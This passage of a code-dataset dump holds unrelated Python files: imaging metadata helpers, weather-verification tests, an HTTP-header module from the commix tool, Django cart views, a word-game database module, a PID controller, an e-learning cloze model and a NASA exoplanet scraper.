print(label.text)\n label = label.text\n print(label)\n print(name)\n cid = '_'.join([label, name])\n cid = cid.strip('(').strip(')')\n name = name.replace('(','').strip(')')\n metadata.setChannelFluor(name, 0, cnr)\n metadata.setChannelName(cid, 0, cnr)\n metadata.setChannelID(cid, 0, cnr)\n # for i in range(c):\n # metadata.setPlaneTheC(NonNegativeInteger(i),0,i)\n # metadata.setPlaneTheZ(NonNegativeInteger(0), 0, i)\n # metadata.setPlaneTheT(NonNegativeInteger(0), 0, i)\n\n\n return metadata\n\n else:\n ac_id = imc_acquisition.image_ID\n metadata.setImageID(ac_id, 0)\n metadata.setImageName(ac_id, 0)\n metadata.setPixelsDimensionOrder(DimensionOrder.XYCZT, 0)\n metadata.setPixelsSizeX(PositiveInteger(x), 0)\n metadata.setPixelsSizeY(PositiveInteger(y), 0)\n metadata.setPixelsSizeC(PositiveInteger(c), 0)\n metadata.setPixelsSizeZ(PositiveInteger(1), 0)\n metadata.setPixelsSizeT(PositiveInteger(1), 0)\n\n metadata.setPixelsPhysicalSizeX(Length(1, units.MICROM), 0)\n metadata.setPixelsPhysicalSizeY(Length(1, units.MICROM), 0)\n metadata.setPixelsPhysicalSizeZ(Length(1, units.MICROM), 0)\n\n metadata.setPixelsID(ac_id, 0)\n metadata.setPixelsType(PixelType.FLOAT, 0)\n metadata.setPixelsInterleaved(False, 0)\n\n # metadata.setTiffDataFirstC(NonNegativeInteger(0), 0, 0)\n # metadata.setTiffDataFirstZ(NonNegativeInteger(0), 0, 0)\n # metadata.setTiffDataFirstT(NonNegativeInteger(0), 0, 0)\n print(c)\n for i in range(c):\n metadata.setChannelSamplesPerPixel(PositiveInteger(1), 0, i)\n for cnr, metal, label in zip(range(c), imc_acquisition.channel_metals, imc_acquisition.channel_labels):\n metadata.setChannelFluor(metal, 0, cnr)\n metadata.setChannelName(label, 0, cnr)\n metadata.setChannelID(label, 0, cnr)\n\n return metadata\n\n\ndef save_ome_tiff(filename, image, metadata):\n reader = ImageReader()\n writer = ImageWriter()\n writer.setMetadataRetrieve(metadata)\n writer.setId(filename)\n nchan = image.getNChannels()\n stack = image.getImageStack()\n print(image.getStackSize())\n for i in range(nchan):\n writer.setSeries(0)\n process = stack.getProcessor(i+1)\n pixels = process.getPixels()\n pixels = DataTools.floatsToBytes(pixels, True)\n writer.saveBytes(i, pixels)\n writer.close()\n\n\n\n\n","sub_path":"imctools/imagej/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":9472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"19714615","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport re\nimport logging\nfrom collections import namedtuple\nimport pytest\nimport datetime\n\nimport produtil\n\nfrom metplus.wrappers.regrid_data_plane_wrapper import RegridDataPlaneWrapper\nfrom metplus.util import met_util as util\nfrom metplus.util import time_util\n\n# --------------------TEST CONFIGURATION and FIXTURE SUPPORT -------------\n#\n# The test configuration and fixture support the additional configuration\n# files used in METplus\n# !!!!!!!!!!!!!!!\n# !!!IMPORTANT!!!\n# !!!!!!!!!!!!!!!\n# The following two methods should be included in ALL pytest tests for METplus.\n#\n#\n#def pytest_addoption(parser):\n# parser.addoption(\"-c\", action=\"store\", help=\" -c \")\n\n\n# @pytest.fixture\n#def cmdopt(request):\n# return request.config.getoption(\"-c\")\n\n\n# -----------------FIXTURES THAT CAN BE USED BY ALL TESTS----------------\n#@pytest.fixture\ndef rdp_wrapper(metplus_config):\n \"\"\"! 
Returns a default RegridDataPlane with /path/to entries in the\n metplus_system.conf and metplus_runtime.conf configuration\n files. Subsequent tests can customize the final METplus configuration\n to over-ride these /path/to values.\"\"\"\n\n config = metplus_config()\n config.set('config', 'DO_NOT_RUN_EXE', True)\n return RegridDataPlaneWrapper(config)\n\n# ------------------------ TESTS GO HERE --------------------------\n\n# conf_dict is produtil config items set before creating grid_stat wrapper instance\n# out_dict is grid_stat wrapper c_dict values set by initialization\n@pytest.mark.parametrize(\n 'conf_dict, expected_field_info_list', [\n\n # 0) 1 item from var list\n ({'OBS_VAR1_NAME': 'APCP',\n 'OBS_VAR1_LEVELS': \"A06\"},\n [{'index': '1', 'obs_name': 'APCP', 'obs_level': 'A06'}]\n ),\n\n # 1) 1 item with level replaced from wrapper-specific\n ({'OBS_VAR1_NAME': 'P06M_NONE',\n 'OBS_VAR1_LEVELS': \"\\\"(*,*)\\\"\",\n 'OBS_REGRID_DATA_PLANE_VAR1_INPUT_LEVEL': '\"({valid?fmt=%Y%m%d_%H%M%S},*,*)\"'},\n [{'index': '1', 'obs_name': 'P06M_NONE', 'obs_level': '\"(20180201_000000,*,*)\"'},\n ]\n ),\n\n # 2) 2 items from var list\n ({'OBS_VAR1_NAME': 'APCP',\n 'OBS_VAR1_LEVELS': \"A06\",\n 'OBS_VAR2_NAME': 'ACPCP',\n 'OBS_VAR2_LEVELS': \"A03\",},\n [{'index': '1', 'obs_name': 'APCP', 'obs_level': 'A06'},\n {'index': '2', 'obs_name': 'ACPCP', 'obs_level': 'A03'},\n ]\n ),\n\n # 3) 2 items from var list, 3rd from wrapper-specific\n ({'OBS_VAR1_NAME': 'APCP',\n 'OBS_VAR1_LEVELS': \"A06\",\n 'OBS_VAR2_NAME': 'ACPCP',\n 'OBS_VAR2_LEVELS': \"A03\",\n 'OBS_REGRID_DATA_PLANE_VAR3_INPUT_FIELD_NAME': 'NAME_FOR_3'},\n [{'index': '1', 'obs_name': 'APCP', 'obs_level': 'A06'},\n {'index': '2', 'obs_name': 'ACPCP', 'obs_level': 'A03'},\n {'index': '3', 'obs_name': 'NAME_FOR_3'},\n ]\n ),\n\n # 4) 3 items from var list, 1 replaced and 4th from wrapper-specific\n ({'OBS_VAR1_NAME': 'APCP',\n 'OBS_VAR1_LEVELS': \"A06\",\n 'OBS_VAR2_NAME': 'ACPCP',\n 'OBS_VAR2_LEVELS': \"A03\",\n 'OBS_VAR3_NAME': 'ACPCP',\n 'OBS_VAR3_LEVELS': \"A02\",\n 'OBS_REGRID_DATA_PLANE_VAR3_INPUT_FIELD_NAME': 'NAME_FOR_3',\n 'OBS_REGRID_DATA_PLANE_VAR4_INPUT_FIELD_NAME': 'NAME_FOR_4',\n 'OBS_REGRID_DATA_PLANE_VAR4_INPUT_LEVEL': 'LEVEL_FOR_4'},\n [{'index': '1', 'obs_name': 'APCP', 'obs_level': 'A06'},\n {'index': '2', 'obs_name': 'ACPCP', 'obs_level': 'A03'},\n {'index': '3', 'obs_name': 'NAME_FOR_3', 'obs_level': 'A02'},\n {'index': '4', 'obs_name': 'NAME_FOR_4', 'obs_level': 'LEVEL_FOR_4'},\n ]\n ),\n\n # 5) 1 item from var list add output name\n ({'OBS_VAR1_NAME': 'APCP',\n 'OBS_VAR1_LEVELS': \"A06\",\n 'OBS_REGRID_DATA_PLANE_VAR1_OUTPUT_FIELD_NAME': 'OUT_NAME',},\n [{'index': '1', 'obs_name': 'APCP', 'obs_level': 'A06', 'obs_output_name': 'OUT_NAME'}]\n ),\n\n # 6) 3 items from var list, 1 replaced and 4th from wrapper-specific, add output name\n ({'OBS_VAR1_NAME': 'APCP',\n 'OBS_VAR1_LEVELS': \"A06\",\n 'OBS_VAR2_NAME': 'ACPCP',\n 'OBS_VAR2_LEVELS': \"A03\",\n 'OBS_VAR3_NAME': 'ACPCP',\n 'OBS_VAR3_LEVELS': \"A02\",\n 'OBS_REGRID_DATA_PLANE_VAR3_INPUT_FIELD_NAME': 'NAME_FOR_3',\n 'OBS_REGRID_DATA_PLANE_VAR4_INPUT_FIELD_NAME': 'NAME_FOR_4',\n 'OBS_REGRID_DATA_PLANE_VAR4_INPUT_LEVEL': 'LEVEL_FOR_4',\n 'OBS_REGRID_DATA_PLANE_VAR4_OUTPUT_FIELD_NAME': 'OUT_NAME_4'},\n [{'index': '1', 'obs_name': 'APCP', 'obs_level': 'A06'},\n {'index': '2', 'obs_name': 'ACPCP', 'obs_level': 'A03'},\n {'index': '3', 'obs_name': 'NAME_FOR_3', 'obs_level': 'A02'},\n {'index': '4', 'obs_name': 'NAME_FOR_4', 'obs_level': 'LEVEL_FOR_4', 'obs_output_name': 
'OUT_NAME_4'},\n ]\n ),\n ]\n)\n\ndef test_get_field_info_list(metplus_config, conf_dict, expected_field_info_list):\n config = metplus_config()\n\n data_type = 'OBS'\n\n for key, value in conf_dict.items():\n config.set('config', key, value)\n\n input_dict = {'valid': datetime.datetime.strptime(\"201802010000\", '%Y%m%d%H%M'),\n 'lead': 0}\n time_info = time_util.ti_calculate(input_dict)\n\n var_list = util.parse_var_list(config, time_info, data_type=data_type)\n\n rdp = RegridDataPlaneWrapper(config)\n\n field_info_list = rdp.get_field_info_list(var_list, data_type, time_info)\n print(f\"FIELD INFO LIST: {field_info_list}\")\n print(f\"EXPECTED FIELD INFO LIST: {expected_field_info_list}\")\n is_good = True\n if len(field_info_list) != len(expected_field_info_list):\n assert(False)\n\n for actual_field, expected_field in zip(field_info_list, expected_field_info_list):\n for key, value in expected_field.items():\n if actual_field[key] != value:\n print(f\"{actual_field[key]} not equal to {value}\")\n is_good = False\n\n# field info is the input dictionary with name and level info to parse\n# expected_arg is the argument that should be set by the function\n# note: did not include OBS because they are handled the same way as FCST\n@pytest.mark.parametrize(\n 'field_info, expected_arg', [\n\n # 0) name/level\n ({'fcst_name': 'F_NAME',\n 'fcst_level': \"\\\"(1,*,*)\\\"\"},\n \"-field 'name=\\\"F_NAME\\\"; level=\\\"(1,*,*)\\\";'\"\n ),\n\n # 1) python embedding script\n ({'fcst_name': 'my_script.py some args',\n 'fcst_level': \"\"},\n \"-field 'name=\\\"my_script.py some args\\\";'\"\n ),\n\n # 2) name/level\n ({'fcst_name': 'F_NAME',\n 'fcst_level': \"A06\"},\n \"-field 'name=\\\"F_NAME\\\"; level=\\\"A06\\\";'\"\n ),\n\n # 3) name, no level\n ({'fcst_name': 'F_NAME',\n 'fcst_level': \"\"},\n \"-field 'name=\\\"F_NAME\\\";'\"\n ),\n\n # 4) python embedding script\n ({'fcst_name': 'my_script.py some args',\n 'fcst_level': \"\"},\n \"-field 'name=\\\"my_script.py some args\\\";'\"\n ),\n ]\n)\n\ndef test_set_field_command_line_arguments(metplus_config, field_info, expected_arg):\n data_type = 'FCST'\n\n config = metplus_config()\n\n rdp = RegridDataPlaneWrapper(config)\n\n rdp.set_field_command_line_arguments(field_info, data_type)\n assert(rdp.args[0] == expected_arg)\n\n@pytest.mark.parametrize(\n 'field_info, input_name, expected_name', [\n\n # 0) use fcst name\n ({'fcst_output_name': 'F_NAME'},\n \"INPUT_NAME\",\n 'F_NAME',\n ),\n\n # 1) empty fcst name, use input name\n ({'fcst_output_name': ''},\n \"INPUT_NAME\",\n 'INPUT_NAME',\n ),\n\n # 2) no fcst name, use input name\n ({'fcst_name': 'F_NAME'},\n \"INPUT_NAME\",\n 'INPUT_NAME',\n ),\n ]\n)\ndef test_get_output_name(metplus_config, field_info, input_name, expected_name):\n data_type = 'FCST'\n\n config = metplus_config()\n rdp = RegridDataPlaneWrapper(config)\n\n assert(rdp.get_output_name(field_info, data_type, input_name) == expected_name)\n\ndef test_run_rdp_once_per_field(metplus_config):\n data_type = 'FCST'\n\n input_dict = {'valid': datetime.datetime.strptime(\"201802010000\",'%Y%m%d%H%M'),\n 'lead': 0}\n time_info = time_util.ti_calculate(input_dict)\n\n var_list = [{'index': '1', 'fcst_name': 'FNAME1', 'fcst_level': 'A06'},\n {'index': '2', 'fcst_name': 'FNAME2', 'fcst_level': 'A03', 'fcst_output_name': 'OUTNAME2'},\n ]\n\n wrap = rdp_wrapper(metplus_config)\n wrap.c_dict['ONCE_PER_FIELD'] = True\n wrap.c_dict['FCST_OUTPUT_TEMPLATE'] = '{valid?fmt=%Y%m%d%H}_accum{level?fmt=%2H}.nc'\n\n wrap.c_dict['FCST_INPUT_TEMPLATE'] = 
'{valid?fmt=%Y%m%d%H}_ZENITH'\n wrap.c_dict['METHOD'] = 'BUDGET'\n wrap.c_dict['WIDTH'] = 2\n wrap.c_dict['VERIFICATION_GRID'] = 'VERIF_GRID'\n wrap.c_dict['FCST_OUTPUT_DIR'] = os.path.join(wrap.config.getdir('OUTPUT_BASE'),\n 'RDP_test')\n\n wrap.run_at_time_once(time_info, var_list, data_type)\n\n expected_cmds = [f\"{wrap.app_path} -v 2 -method BUDGET -width 2 -field 'name=\\\"FNAME1\\\"; \"\n \"level=\\\"A06\\\";' -name FNAME1 2018020100_ZENITH \\\"VERIF_GRID\\\" \"\n f\"{wrap.config.getdir('OUTPUT_BASE')}/RDP_test/2018020100_accum06.nc\",\n f\"{wrap.app_path} -v 2 -method BUDGET -width 2 -field 'name=\\\"FNAME2\\\"; \"\n \"level=\\\"A03\\\";' -name OUTNAME2 2018020100_ZENITH \\\"VERIF_GRID\\\" \"\n f\"{wrap.config.getdir('OUTPUT_BASE')}/RDP_test/2018020100_accum03.nc\",\n ]\n\n test_passed = True\n\n if len(wrap.all_commands) != len(expected_cmds):\n print(\"Number of commands run is not the same as expected\")\n print(f\"Actual commands: {wrap.all_commands}\\n\")\n print(f\"Expected commands: {expected_cmds}\\n\")\n assert(False)\n\n for (cmd, _), expected_cmd in zip(wrap.all_commands, expected_cmds):\n print(f\" ACTUAL:{cmd}\")\n print(f\"EXPECTED:{expected_cmd}\")\n if cmd != expected_cmd:\n test_passed = False\n\n assert(test_passed)\n\ndef test_run_rdp_all_fields(metplus_config):\n data_type = 'FCST'\n\n input_dict = {'valid': datetime.datetime.strptime(\"201802010000\",'%Y%m%d%H%M'),\n 'lead': 0}\n time_info = time_util.ti_calculate(input_dict)\n\n var_list = [{'index': '1', 'fcst_name': 'FNAME1', 'fcst_level': 'A06'},\n {'index': '2', 'fcst_name': 'FNAME2', 'fcst_level': 'A03', 'fcst_output_name': 'OUTNAME2'},\n ]\n\n wrap = rdp_wrapper(metplus_config)\n wrap.c_dict['ONCE_PER_FIELD'] = False\n wrap.c_dict['FCST_OUTPUT_TEMPLATE'] = '{valid?fmt=%Y%m%d%H}_ALL.nc'\n\n wrap.c_dict['FCST_INPUT_TEMPLATE'] = '{valid?fmt=%Y%m%d%H}_ZENITH'\n wrap.c_dict['METHOD'] = 'BUDGET'\n wrap.c_dict['WIDTH'] = 2\n wrap.c_dict['VERIFICATION_GRID'] = 'VERIF_GRID'\n wrap.c_dict['FCST_OUTPUT_DIR'] = os.path.join(wrap.config.getdir('OUTPUT_BASE'),\n 'RDP_test')\n\n wrap.run_at_time_once(time_info, var_list, data_type)\n\n expected_cmds = [f\"{wrap.app_path} -v 2 -method BUDGET -width 2 -field 'name=\\\"FNAME1\\\"; \"\n \"level=\\\"A06\\\";' -field 'name=\\\"FNAME2\\\"; level=\\\"A03\\\";' \"\n \"-name FNAME1,OUTNAME2 2018020100_ZENITH \\\"VERIF_GRID\\\" \"\n f\"{wrap.config.getdir('OUTPUT_BASE')}/RDP_test/2018020100_ALL.nc\",\n ]\n\n test_passed = True\n\n if len(wrap.all_commands) != len(expected_cmds):\n print(\"Number of commands run is not the same as expected\")\n assert(False)\n\n for (cmd, _), expected_cmd in zip(wrap.all_commands, expected_cmds):\n print(f\" ACTUAL:{cmd}\")\n print(f\"EXPECTED:{expected_cmd}\")\n if cmd != expected_cmd:\n test_passed = False\n\n assert(test_passed)\n\ndef test_set_command_line_arguments(metplus_config):\n test_passed = True\n wrap = rdp_wrapper(metplus_config)\n\n expected_args = ['-width 1',]\n\n wrap.set_command_line_arguments()\n if wrap.args != expected_args:\n test_passed = False\n print(\"Test 0 failed\")\n print(f\"ARGS: {wrap.args}\")\n print(f\"EXP: {expected_args}\")\n\n wrap.c_dict['GAUSSIAN_DX'] = 2\n\n expected_args = ['-width 1',\n '-gaussian_dx 2',\n ]\n\n wrap.args.clear()\n\n wrap.set_command_line_arguments()\n if wrap.args != expected_args:\n test_passed = False\n print(\"Test 1 failed\")\n print(f\"ARGS: {wrap.args}\")\n print(f\"EXP: {expected_args}\")\n\n wrap.args.clear()\n\n wrap.c_dict['METHOD'] = 'BUDGET'\n\n expected_args = ['-method 
BUDGET',\n '-width 1',\n '-gaussian_dx 2',\n ]\n\n wrap.set_command_line_arguments()\n if wrap.args != expected_args:\n test_passed = False\n print(\"Test 2 failed\")\n print(f\"ARGS: {wrap.args}\")\n print(f\"EXP: {expected_args}\")\n\n wrap.args.clear()\n\n wrap.c_dict['GAUSSIAN_RADIUS'] = 3\n\n expected_args = ['-method BUDGET',\n '-width 1',\n '-gaussian_dx 2',\n '-gaussian_radius 3',\n ]\n\n wrap.set_command_line_arguments()\n if wrap.args != expected_args:\n test_passed = False\n print(\"Test 3 failed\")\n print(f\"ARGS: {wrap.args}\")\n print(f\"EXP: {expected_args}\")\n\n wrap.args.clear()\n\n wrap.c_dict['WIDTH'] = 4\n\n expected_args = ['-method BUDGET',\n '-width 4',\n '-gaussian_dx 2',\n '-gaussian_radius 3',\n ]\n\n wrap.set_command_line_arguments()\n if wrap.args != expected_args:\n test_passed = False\n print(\"Test 4 failed\")\n print(f\"ARGS: {wrap.args}\")\n print(f\"EXP: {expected_args}\")\n\n wrap.args.clear()\n\n assert(test_passed)\n","sub_path":"internal_tests/pytests/regrid_data_plane/test_regrid_data_plane.py","file_name":"test_regrid_data_plane.py","file_ext":"py","file_size_in_byte":14207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"607066046","text":"#!/usr/bin/env python\n# encoding: UTF-8\n\n\"\"\"\n This file is part of commix (@commixproject) tool.\n Copyright (c) 2015 Anastasios Stasinopoulos (@ancst).\n https://github.com/stasinopoulos/commix\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n \n For more see the file 'readme/COPYING' for copying permission.\n\"\"\"\n\nimport re\nimport base64\n\nfrom src.utils import menu\n\n\"\"\"\n Check for added headers.\n\"\"\"\n\ndef do_check(request):\n \n # Check if defined any HTTP Host header.\n if menu.options.host:\n Host = menu.options.host\n request.add_header('Host', Host)\n \n # Check if defined any HTTP Referer header.\n if menu.options.referer:\n Referer = menu.options.agent\n request.add_header('Referer', Referer)\n \n # Check if defined any HTTP User-Agent header.\n if menu.options.agent:\n Agent = menu.options.agent\n request.add_header('User-Agent', Agent)\n \n # Check if defined any HTTP Cookie header.\n if menu.options.cookie:\n Cookie = menu.options.cookie\n request.add_header('Cookie', Cookie)\n\n # Check if defined any HTTP Basic Authentication credentials.\n if menu.options.auth_cred:\n b64_string = base64.encodestring(menu.options.auth_cred).replace('\\n', '')\n request.add_header(\"Authorization\", \"Basic \" + b64_string +\"\")\n \n # Check if defined any extra HTTP headers.\n if menu.options.headers:\n extra_headers = menu.options.headers\n extra_headers = extra_headers.split(\":\")\n extra_headers = ':'.join(extra_headers)\n extra_headers = extra_headers.split(\"\\\\n\")\n # Remove empty strings\n extra_headers = [x for x in extra_headers if x]\n for extra_header in extra_headers:\n # Extra HTTP Header name \n http_header_name = re.findall(r\"(.*):\", extra_header)\n http_header_name = ''.join(http_header_name)\n # Extra HTTP Header value\n http_header_value = re.findall(r\":(.*)\", extra_header)\n http_header_value = ''.join(http_header_value)\n request.add_header(http_header_name, 
http_header_value)\n\n#eof","sub_path":"src/core/requests/headers.py","file_name":"headers.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"272774742","text":"from django.shortcuts import render, redirect, HttpResponse\n\n# Create your views here.\n\ndef view_bag(request):\n ''' a view that renders the bag content'''\n return render(request, 'bag/bag.html')\n\n\ndef add_to_bag(request, item_name):\n \"\"\" Add a product/service to bag \"\"\"\n\n redirect_url = request.POST.get('redirect_url')\n bag = request.session.get('bag', {})\n\n if item_name not in bag:\n bag[item_name] = item_name\n\n request.session['bag'] = bag\n return redirect(redirect_url)\n\n\ndef remove_from_bag(request, item_name):\n \"\"\" remove the item from bag\"\"\"\n\n bag = request.session.get('bag', {})\n if item_name in bag:\n bag.pop(item_name)\n\n request.session['bag'] = bag\n return HttpResponse(status=200)","sub_path":"bag/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"389832244","text":"from db_operations.connection import dictionary\n\n# Variables\nwords_on_game = []\nwords_already_played = []\n\ndef create_theme(name: str, words: list) -> int:\n \"\"\"\n This function creates a new theme in the game.\n :param name: Name of the theme.\n :param words: Words included in the theme.\n :return: 1. Created successfully, 2. Insertion problem, 3. Invalid name, 4. Theme already created\n \"\"\"\n valid_theme = True\n valid_theme &= True if \"\".join(name.strip().split()).isalpha() and len(name) > 1 else False\n\n theme_names = list(dictionary.find({'name': name.strip().title()}))\n\n valid_theme &= True if len(theme_names) == 0 else False\n\n # Validate the words that were entered\n valid_words = []\n\n for word in words:\n valid = True\n valid &= True if word.strip().isalpha() else False\n valid &= True if len(word) > 1 else False\n\n if valid:\n ready_word = word.strip().title()\n valid_words.append(ready_word)\n\n if len(theme_names) == 0:\n if valid_theme:\n theme = {\n 'name': name.strip().title(),\n 'words': valid_words,\n 'times_used': 0\n }\n\n try:\n dictionary.insert_one(theme)\n return 1\n except:\n return 2\n else:\n return 3\n else:\n return 4\n\n\ndef get_themes() -> list:\n \"\"\"\n This function fetches every theme from the database.\n :return: A list with the name of each theme.\n \"\"\"\n themes = ['Agregar tema', 'Todos los temas']\n all_themes = list(dictionary.find())\n\n for theme in all_themes:\n themes.append(theme['name'])\n\n return themes\n\n\ndef setup_words(themes: list) -> None:\n \"\"\"\n This function builds a local list with all the words fetched from the\n database for the themes that are active in the current game.\n :param themes: A list with the names of the themes in play.\n :return: Nothing\n \"\"\"\n if \"Todos los temas\" in themes:\n all_themes = list(dictionary.find())\n for theme in all_themes:\n for word in theme['words']:\n words_on_game.append(word)\n else:\n db_themes = list(dictionary.find())\n for theme in db_themes:\n if theme['name'] in themes:\n for word in theme['words']:\n words_on_game.append(word)\n\n\ndef check_word(word: str) -> int:\n \"\"\"\n Checks whether the received word is part of the game's word list.\n :param word: Word entered by the user.\n :return: 1. Word is in the game's word list, 2. Word is not in the list.\n \"\"\"\n if word.title() in words_on_game:\n return 1\n else:\n return 2\n\n\ndef is_word_played(word: str) -> int:\n \"\"\"\n This function receives a word and checks whether that word was already used in the game.\n :param word: Word entered by the player.\n :return: 1. Word not used yet, 2. Word already used.\n \"\"\"\n if word.title() in words_already_played:\n return 2\n else:\n return 1\n\n\ndef add_word_db(word: str, theme: str) -> int:\n \"\"\"\n This function adds the word to the given theme in the database.\n :param word: Word entered by the user.\n :param theme: Theme chosen by the user.\n :return: 1. Successful insertion, 2. Failed insertion.\n \"\"\"\n\n\n db_theme = list(dictionary.find({'name': theme}))[0]\n previous_length = len(db_theme['words'])\n\n word = word.title()\n dictionary.update(\n {'name': theme},\n {'$push': {'words': word}}\n )\n\n db_theme = list(dictionary.find({'name': theme}))[0]\n after_length = len(db_theme['words'])\n\n if after_length == (previous_length + 1):\n return 1\n return 2\n\n\ndef get_words(theme: str) -> list:\n \"\"\"\n This function looks up the theme received as a parameter in the database\n and returns a list with the words that were found.\n :param theme: Name of the theme to look up.\n :return: List with the words found.\n \"\"\"\n my_theme = list(dictionary.find({'name': theme}))[0]\n\n return my_theme['words']\n\n\ndef update_word_db(prev_word: str, after_word: str, theme: str) -> int:\n \"\"\"\n This function modifies the given word in the database.\n :param prev_word: Word selected from the database by the user.\n :param after_word: Edited, valid word that will replace the value of prev_word in the database.\n :param theme: Theme that contains the word to be edited.\n :return: 1. Successful transaction, 2. Failed transaction.\n \"\"\"\n\n\n try:\n dictionary.update(\n {'name': theme, 'words': prev_word},\n {'$set': {'words.$': after_word}}\n )\n return 1\n except:\n return 2\n\n\ndef delete_word_db(word: str, theme: str) -> int:\n \"\"\"\n This function deletes a word from the database.\n :param word: Word to delete.\n :param theme: Theme the word will be deleted from.\n :return: 1. Successful transaction, 2. Failed transaction.\n \"\"\"\n\n try:\n dictionary.update(\n {'name': theme},\n {'$pull': {'words': word}}\n )\n return 1\n except:\n return 2\n\n\n\n\n\n\n\n\n\n","sub_path":"db_operations/themes.py","file_name":"themes.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"136472005","text":"import time\n\nclass PIDController:\n def __init__(self, k_P, k_I, k_D, target_value = 0):\n self.k_P = k_P\n self.k_I = k_I\n self.k_D = k_D\n self.e_P = 0\n self.e_I = 0\n self.e_D = 0\n self.target_value = target_value\n self.adjusted_value = target_value\n self.last_time = None\n def send_value(self, value):\n # Check for first run\n if self.last_time is None:\n self.last_time = time.time()\n self.e_P = value - self.target_value\n return\n # Update the time difference\n new_time = time.time()\n dt = new_time - self.last_time\n self.last_time = new_time\n # Update the errors\n new_error = value - self.target_value\n self.e_D = (new_error - self.e_P) / dt\n self.e_I += new_error * dt\n self.e_P = new_error\n # Update the adjusted value\n self.adjusted_value = self.target_value - (self.k_P * self.e_P + self.k_I * self.e_I + self.k_D * self.e_D)
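\n\n# A minimal usage sketch (an added note, not part of the original module):\n# read_sensor() and apply_output() are hypothetical stand-ins for a real\n# measurement source and actuator; the controller is driven by feeding it\n# measurements and reading back adjusted_value.\n#\n# pid = PIDController(k_P=2.0, k_I=0.5, k_D=0.1, target_value=65.0)\n# while True:\n#     pid.send_value(read_sensor())\n#     apply_output(pid.adjusted_value)\n#     time.sleep(0.1)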
\n","sub_path":"gnc/pid.py","file_name":"pid.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"13024452","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom exeapp.models.idevices.idevice import Idevice\nfrom exeapp.models.idevices.genericidevice import GenericIdevice\nfrom exeapp.models.idevices import fields\n\nclass ClozeIdevice(GenericIdevice):\n\n group = Idevice.TEST\n name = _(\"Cloze\")\n title = models.CharField(max_length=100, default=name)\n author = _(\"University of Auckland\")\n purpose = _(\"\"\"

    Cloze exercises are texts or\n sentences where students must fill in\n missing words. They are often used for the\n following purposes:
    1. To check knowledge of core course\n concepts (this could be a pre-check,\n formative exercise, or summative check).
    2. To check reading comprehension.
    3. To check vocabulary knowledge.
    4. To check word formation and/or grammatical\n competence.
    \"\"\")\n emphasis = Idevice.SOMEEMPHASIS\n icon = \"icon_question.gif\"\n description = fields.RichTextField(blank=True, default=\"\",\n help_text=_(\"\"\"Provide instruction on how the cloze activity should be\ncompleted. Default text will be entered if there are no changes to this field.\n\"\"\"))\n cloze_text = fields.ClozeTextField(blank=True, default=\"\",\n help_text=_(\"\"\"Enter the text for the cloze activity in to the cloze field\nby either pasting text from another source or by typing text directly into the\nfield.To select words to hide, double click on the word to select it and\nclick on the underscore button in the toolbar.\"\"\"))\n feedback = fields.FeedbackField(blank=True, default=\"\",\n help_text=_(\"\"\"Enter any feedback you wish to provide the learner\n with-in the feedback field. This field can be left blank.\"\"\"))\n drag_n_drop = models.BooleanField(default=False)\n\n class Meta:\n app_label = \"exeapp\"\n\n","sub_path":"exeapp/models/idevices/clozeidevice.py","file_name":"clozeidevice.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"354562911","text":"# -*- coding: utf-8 -*-\nimport json\nimport requests\nfrom back.encrpyt import interfaceDes\nfrom back.log import Log\n\nclass testApi:\n def __init__(self):\n self.header1 = {'Accept': '* / *',\n 'Accept - Encoding': 'gzip, deflate, br',\n 'Accept - Language': 'zh, en - US;q = 0.9, en;q = 0.8, zh - CN;q = 0.7',\n 'Connection': 'keep - alive',\n 'Content - Type': 'text/html;charset=utf-8'\n }\n self.header2 = {'content-type': 'application/x-www-form-urlencoded', 'Access-Control-Allow-Origin': '*'}\n\n def lRequest(self, url, service, method='post', data='', headers=''): # 接口请求\n if type(service) is str: service = {\"service\": service}\n if 'webapi' in url:\n if any(data) and any(headers) is False:\n headers = self.header1\n if 'test' in url:\n data = data\n else:\n print(data)\n print(type(data))\n data = interfaceDes(data)\n else:\n if any(data) and any(headers) is False:\n headers = self.header2\n if 'test' in url:\n data = data\n else:\n data = interfaceDes(data, web_api=False)\n try:\n r = requests.request(method, url, data=data, headers=headers, params=service)\n response_code = r.status_code\n response_text1 = json.loads(r.text) # 对返回的指定字段断言,字段名取自Excel的期望2\n Log().info(' 【成功发起POST请求】 请求结果code为:%s, 请求结果字段为:%s' % (response_code, json.loads(r.text)))\n return response_code, response_text1\n except Exception as e:\n Log().error('【post请求出错】 出错原因:%s' % e)\n return {'code': 1, 'result': 'post请求出错,出错原因:%s' % e}","sub_path":"back/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339483091","text":"from selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport csv\r\nimport requests\r\nSTART_URL = \"https://exoplanets.nasa.gov/exoplanet-catalog/\"\r\nbrowser = webdriver.Chrome(\"chromedriver_win32\\chromedriver.exe\")\r\nbrowser.get(START_URL)\r\ntime.sleep(10)\r\n\r\nheaders = [\"Star\", \"Constellation\", \"Right ascensation\", \"App_mag\", \"Distance\",\"hyperlink\"]\r\nplanet_data=[]\r\ndef scrap():\r\n for i in range(1,430):\r\n while True :\r\n time.sleep(2)\r\n soup = BeautifulSoup(browser.page_source, \"html.parser\")\r\n 